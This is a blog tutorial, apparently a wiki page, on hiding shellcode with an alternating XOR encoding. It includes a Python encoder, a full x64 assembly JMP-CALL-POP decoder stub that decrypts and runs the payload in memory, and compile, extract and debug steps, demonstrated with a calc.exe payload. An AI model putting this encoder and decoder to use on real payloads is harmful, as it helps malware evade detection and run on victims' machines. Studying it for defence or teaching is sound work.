You've loaded an old revision of the document! If you save it, you will create a new version with this data. Media Files{{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-security:blog:2024-320-byteswap-header.webp?400|}} <callout title="Polymorphy" type="info" icon="true"> An object with a different appearance always fulfils the same function. </callout> In the last post, I decrypted an encrypted shellcode in the working memory and had it executed. As encryption, I converted each byte with an XOR calculation. Now I would like to bring a little more dynamism into the encryption to make decrypting the shellcode a little more difficult. \\ \\ ===== Preliminary considerations ===== How do I get the statics given by the XOR key? Instead of calculating every byte with the key, I only do this for every second byte. I then encrypt the omitted bytes with the result of the previous one: ((Note: even and odd refers to the offset, so byte 1 at offset 0 is even and byte 2 is odd)). )) $EncryptedByte(even) = Byte(even) \wedge Key(XOR)$ $EncryptedByte(odd) = Byte(odd) \wedge EncryptedByte(even)$ ==== Example ==== This example shows that the output is very different simply by choosing a different XOR key. ^ ^Byte 1 ^Byte 2 ^Byte 3 ^Byte 4 ^ |**unencrypted**|''%%01%%''|''%%AF%%''|''%%45%%''|''%%C3%%''| |**XOR value 1** |''%%15%%''|''%%14%%''|''%%15%%''|''%%50%%''| |**encrypted** |''%%14%%''|''%%BB%%''|''%%50%%''|''%%93%%''| |**XOR value 2** |''%%57%%''|''%%56%%''|''%%57%%''|''%%12%%''| |**encrypted** |''%%56%%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corresponding Python function is quickly explained: * Function call with the bytes to be encoded and the desired XOR key * Initialise the required variables * A ''%%for%%'' loop runs through each byte * If the division by 2 results in a remainder of 0, we have an even byte * Encrypt the byte with the XOR key * Add the encrypted byte to the byte array * Store the encrypted byte for the next run * Otherwise an odd one * Encrypt the byte with the one from the previous pass * Add the encrypted byte to the byte array * Return the byte array as the result <code python> def encrypt(data: bytes, xor_key: int) -> bytes: transformed = bytearray() prev_enc_byte = 0 for i, byte in enumerate(data): if i % 2 == 0: # even byte positions enc_byte = byte ^ xor_key else: # odd byte positions enc_byte = byte ^ prev_enc_byte transformed.append(enc_byte) prev_enc_byte = enc_byte return bytes(transformed) </code> ==== Step 2: Assembly ==== Now the assembly must be created, which cancels the encryption. You can find the complete code at the end of the article. === Step 2.1: Initialisation and JMP-CALL-POP === <code stylus> _start: xor rax, rax xor rbx, rbx xor rcx, rcx mov cl, 242 jmp short call_decoder </code> * We set the registers ''%%RAX, RBX and RCX%%'' to ''%%0%%'' * The register ''%%CL%%'' gets the length of the shellcode * We jump in front of the shellcode <code stylus> call_decoder: call decoder Shellcode: db 0x75,0x3d...0x75 </code> * We call the function ''%%Decoder%%'' and the address of the next instruction (our shellcode) is read from the register ''%%RSP%%'' on the stack <code stylus> decoder: pop rsi </code> * and finally we load the shellcode address from the stack into the register ''%%RSI%%'' === Step 2.2: Decoder loop === <code stylus> decode_loop: test rcx, rcx jz Shellcode </code> * Check the value of ''%%RCX%%'' * If ''%%RCX%%'' equals ''%%0%%''then jump to the shellcode <code stylus> mov rdx, rsi sub dl, Shellcode test dl, 1 jnz odd_byte </code> * ''%%RDX%%'' gets the current position we are at * We subtract the address of the shellcode from our current position * A bit-by-bit comparison shows us whether the calculated index is even or odd * If odd, jump to ''%%odd_byte%%'' But how does the comparison work here? The instruction ''%%TEST%%'' checks by comparing bits. Let's take a look at the numbers 1 - 4 in binary notation: ^Decimal ^1 ^2 ^3 ^4 ^ |**Binary**|0001|0010|0011|0100| Even numbers always have a 0 in the last bit and odd numbers have a 1. == Even numbers == <code stylus> mov al, [rsi] xor byte [rsi], 0x20 jmp post_processing </code> * Move the current encrypted byte to the register ''%%AL%%'' for the next pass * Decrypt the byte with the XOR key ''%%0x20%%'' * Jump to ''%%post_processing%%'' == Odd numbers == <code stylus> odd_byte: xor byte [rsi], al </code> * Decrypt the byte with the stored value from the previous pass == Post-processing == <code stylus> post_processing: inc rsi dec rcx jmp decode_loop </code> * Increase ''%%RSI%%'' and thus set the current position one byte further * Reduce ''%%RCX%%'', the length of the shellcode * Jump back to the beginning of the loop === Step 2.3: Shellcode === When the conditions for the end of the loop are met, the system jumps directly to the decrypted shellcode and executes it. === Step 2.4: Compile and clean up === Now we can compile the code: <code shell> nasm -f win64 poly2.asm -o poly.o </code> I do the cleanup with [[https://github.com/psycore8/shencode|ShenCode]]: <code python> python shencode.py formatout -i poly2.o -s inspect ... 0x00000096: 20 00 50 60 48 31 c0 48 ... 0x00000400: a3 67 28 75 1a 00 00 00 </code> * We identify the beginning and the end of the opcode <code python> python shencode.py extract -i poly2.o -o poly2.raw --start-offset 100 --end-offset 404 </code> * Then we extract it and save it in a new file <code python> python shencode.py formatout -i poly2.raw --syntax c ... "\x48\x31\xc0...x67\x28\x75"; </code> * and we can output the shellcode as a C++ variable ==== Step 3: Injecter ==== Now we need an injector to place the shellcode in the working memory. We can copy this from the [[en:it-security:blog:obfuscation_polymorphic_in_memory_decoder#injectcpp|previous post]] ===== Debug ===== After compiling the injector, we can start debugging. I use x64dbg for this. {{it-security:blog:2024-320-byteswap-1.png|}} We press F9 (Execute) and land in the entry point of the application. From here we search for the function ''%%main()%%'' {{it-security:blog:2024-320-byteswap-2.png|}} Once this is found, we select the line and press F4 (Execute to selection) and jump to the function with F7. {{it-security:blog:2024-320-byteswap-3.png|}} The last call statement before ''%%RET%%'' calls the shellcode. We select this line and set a breakpoint with F2. Then press F9 and the programme stops at the breakpoint. We jump in with F7. {{it-security:blog:2024-320-byteswap-4.png|}} We are now in the shellcode. The area below the CALL statement is our encrypted shellcode. Everything above it is the decoder routine. If we now execute CTRL+F7, the execution is slowed down and animated. Here you can see very clearly how the lower area is decrypted. {{it-security:blog:2024-320-byteswap-ani-1.gif|}} I have used my Calc-Payload again at this point, so that at the end ''%%calc.exe%%'' is executed. ===== Repository ===== You can find the complete shellcode here: * Shellcode: [[https://github.com/psycore8/Shellcodes/blob/main/SwapBytes/poly2.asm|poly2.asm]] * [[https://github.com/psycore8/shencode|ShenCode]] ----Please solve the following equation to prove you're human. 34 +11 = Please keep this field empty: SavePreviewCancel Edit summary Note: By editing this page you agree to license your content under the following license: CC Attribution-Noncommercial-Share Alike 4.0 International